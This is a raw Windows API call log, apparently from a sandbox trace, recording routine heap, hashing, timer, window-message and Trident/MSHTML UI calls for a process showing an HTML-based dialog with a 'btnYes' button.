[0168.109] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0168.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0168.111] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.111] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.111] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0168.112] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.113] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0168.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0168.113] _CIsqrt () returned 0x407b027f [0168.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0168.113] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.113] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.113] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0168.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddef8 [0168.114] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.114] HashData (in: pbData=0xd94d50, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0168.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddef8 | out: hHeap=0x5e0000) returned 1 [0168.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0168.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0168.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0168.115] HashData (in: pbData=0x9f82ffc, cbData=0x4, pbHash=0x9f83000, cbHash=0x2 | out: pbHash=0x9f83000) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.115] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.116] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.116] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.116] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.116] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.116] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.116] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.116] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.116] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0168.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0168.116] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.116] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.116] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.116] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0168.116] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.116] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.116] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.116] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.116] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.116] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.117] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0168.117] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.117] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.117] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.117] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.117] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.117] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.117] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.118] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0168.118] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.119] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.119] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.120] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.120] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.120] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0168.121] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0168.121] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0168.121] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0168.122] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0168.125] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0168.125] BitBlt (hdc=0x4010197, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0168.125] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0168.126] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0168.126] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098694513351) returned 1 [0168.127] DeleteObject (ho=0x24040a81) returned 1 [0168.127] GetCurrentThreadId () returned 0xb48 [0168.127] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0168.127] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098694619172) returned 1 [0168.127] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098694625467) returned 1 [0168.127] KillTimer (hWnd=0x30316, uIDEvent=0x2011) returned 1 [0168.128] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.129] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.129] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.129] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.129] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.129] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.129] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0168.130] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.130] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.130] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.130] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0168.130] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098694898067) returned 1 [0168.130] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0168.130] NtdllDefWindowProc_W () returned 0x0 [0168.130] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.131] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.131] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.131] KillTimer (hWnd=0x30316, uIDEvent=0x2014) returned 1 [0168.131] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3098695024776) returned 1 [0168.131] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098695031757) returned 1 [0168.131] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098695042919) returned 1 [0168.131] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098695049610) returned 1 [0168.132] SetEvent (hEvent=0x668) returned 1 [0168.132] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.133] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.133] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.133] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.133] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0168.133] GetCurrentThreadId () returned 0xb48 [0168.133] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.316] GetAsyncKeyState (vKey=17) returned 0 [0168.317] GetAsyncKeyState (vKey=16) returned 0 [0168.317] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0168.317] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.317] memcpy_s (in: _Destination=0xd96c60, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd96c60) returned 0x0 [0168.317] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcc60 [0168.317] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.318] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.318] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.318] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6aed04e9, dwHighDateTime=0x1d7d80b)) [0168.318] GetTickCount () returned 0x1d74b34 [0168.318] malloc (_Size=0x178) returned 0xc86e48 [0168.318] VirtualAlloc (lpAddress=0x759e000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x759e000 [0168.319] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0168.319] IUnknown:Release (This=0xd6ab40) returned 0x7 [0168.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6aed3eed, dwHighDateTime=0x1d7d80b)) [0168.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6aed3eed, dwHighDateTime=0x1d7d80b)) [0168.319] GetTickCount () returned 0x1d74b34 [0168.320] GetCurrentThreadId () returned 0xb48 [0168.320] malloc (_Size=0x28) returned 0xc5d248 [0168.320] GetCurrentThreadId () returned 0xb48 [0168.320] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.320] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.320] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.321] IUnknown:Release (This=0xd6de80) returned 0x1 [0168.321] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.321] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.321] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0168.322] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.322] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.322] IUnknown:Release (This=0xd6dec0) returned 0x1 [0168.322] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.322] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.322] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.323] IUnknown:Release (This=0xd6ab40) returned 0x7 [0168.323] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.323] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.323] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0168.323] SysStringLen (param_1="btnYes") returned 0x6 [0168.323] GetCurrentThreadId () returned 0xb48 [0168.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6aeddb49, dwHighDateTime=0x1d7d80b)) [0168.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6aedef20, dwHighDateTime=0x1d7d80b)) [0168.324] GetTickCount () returned 0x1d74b34 [0168.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6aedef20, dwHighDateTime=0x1d7d80b)) [0168.324] free (_Block=0xc5d248) [0168.324] GetCurrentThreadId () returned 0xb48 [0168.324] GetCurrentThreadId () returned 0xb48 [0168.324] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.325] GetCurrentThreadId () returned 0xb48 [0168.325] GetCurrentThreadId () returned 0xb48 [0168.325] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.326] GetCurrentThreadId () returned 0xb48 [0168.326] GetCurrentThreadId () returned 0xb48 [0168.326] GetCurrentThreadId () returned 0xb48 [0168.327] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.327] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.327] memcpy_s (in: _Destination=0xd96d80, _DestinationSize=0x118, _Source=0xd96c60, _SourceSize=0x118 | out: _Destination=0xd96d80) returned 0x0 [0168.327] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcc80 [0168.327] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.327] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcc80 | out: hHeap=0x5e0000) returned 1 [0168.327] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcc60 | out: hHeap=0x5e0000) returned 1 [0168.328] GetMessagePos () returned 0x11e01d6 [0168.328] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x104, wParam=0x12, lParam=0x20380001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0168.328] NtdllDefWindowProc_W () returned 0x0 [0168.328] GetCurrentThreadId () returned 0xb48 [0168.328] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.328] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.329] NtdllDefWindowProc_W () returned 0x0 [0168.370] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.370] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.370] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.370] NtdllDefWindowProc_W () returned 0x0 [0168.371] NtdllDefWindowProc_W () returned 0x0 [0168.372] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.372] IsIconic (hWnd=0x103e0) returned 0 [0168.372] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0168.373] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0168.373] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0168.373] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0168.373] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0168.373] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0168.373] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0168.373] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x12040a78 [0168.373] GetUpdateRgn (hWnd=0x103e2, hRgn=0x12040a78, bErase=0) returned 1 [0168.373] DeleteObject (ho=0x12040a78) returned 1 [0168.373] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0168.373] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.373] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0168.373] NtdllDefWindowProc_W () returned 0x0 [0168.373] GetCurrentThreadId () returned 0xb48 [0168.373] GetCurrentThreadId () returned 0xb48 [0168.376] NtdllDefWindowProc_W () returned 0x0 [0168.377] NtdllDefWindowProc_W () returned 0x0 [0168.378] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.378] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0168.378] NtdllDefWindowProc_W () returned 0x1 [0168.404] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.405] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0168.405] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0168.405] NtdllDefWindowProc_W () returned 0x0 [0168.405] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.406] NtdllDefWindowProc_W () returned 0x0 [0168.406] NtdllDefWindowProc_W () returned 0x0 [0168.406] NtdllDefWindowProc_W () returned 0x0 [0168.406] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.406] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0168.406] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0 [0168.406] IsChild (hWndParent=0x103e2, hWnd=0x0) returned 0 [0168.406] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0e0 | out: lpPoint=0x19a0e0) returned 1 [0168.407] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199da0 | out: lpPoint=0x199da0) returned 1 [0168.407] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199da0 | out: lpPoint=0x199da0) returned 1 [0168.407] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0168.408] GetMessagePos () returned 0x11e01d6 [0168.408] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x199fd4 | out: plResult=0x199fd4) returned 0x1 [0168.408] NtdllDefWindowProc_W () returned 0x0 [0168.408] GetCurrentThreadId () returned 0xb48 [0168.408] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.408] GetMessagePos () returned 0x11e01d6 [0168.409] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x199ccc | out: plResult=0x199ccc) returned 0x0 [0168.409] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.409] GetMessagePos () returned 0x11e01d6 [0168.409] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.409] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.410] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.410] memcpy_s (in: _Destination=0xd96fc0, _DestinationSize=0x118, _Source=0xd96ea0, _SourceSize=0x118 | out: _Destination=0xd96fc0) returned 0x0 [0168.410] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd00 [0168.410] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.410] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0168.410] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0168.410] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0168.410] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0168.410] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0168.410] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0168.410] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0168.411] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0168.411] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0168.411] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0168.411] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0168.411] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0168.411] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0168.411] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0168.411] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd00 | out: hHeap=0x5e0000) returned 1 [0168.411] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.411] malloc (_Size=0x114) returned 0xc7efd0 [0168.412] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.412] memcpy_s (in: _Destination=0xd970e0, _DestinationSize=0x118, _Source=0xd96ea0, _SourceSize=0x118 | out: _Destination=0xd970e0) returned 0x0 [0168.412] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd00 [0168.412] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0168.412] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0168.414] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0168.414] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0168.414] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0168.414] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0168.414] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0168.415] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0168.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.416] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd00 | out: hHeap=0x5e0000) returned 1 [0168.416] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x19958c | out: plResult=0x19958c) returned 0x0 [0168.416] GetCurrentThreadId () returned 0xb48 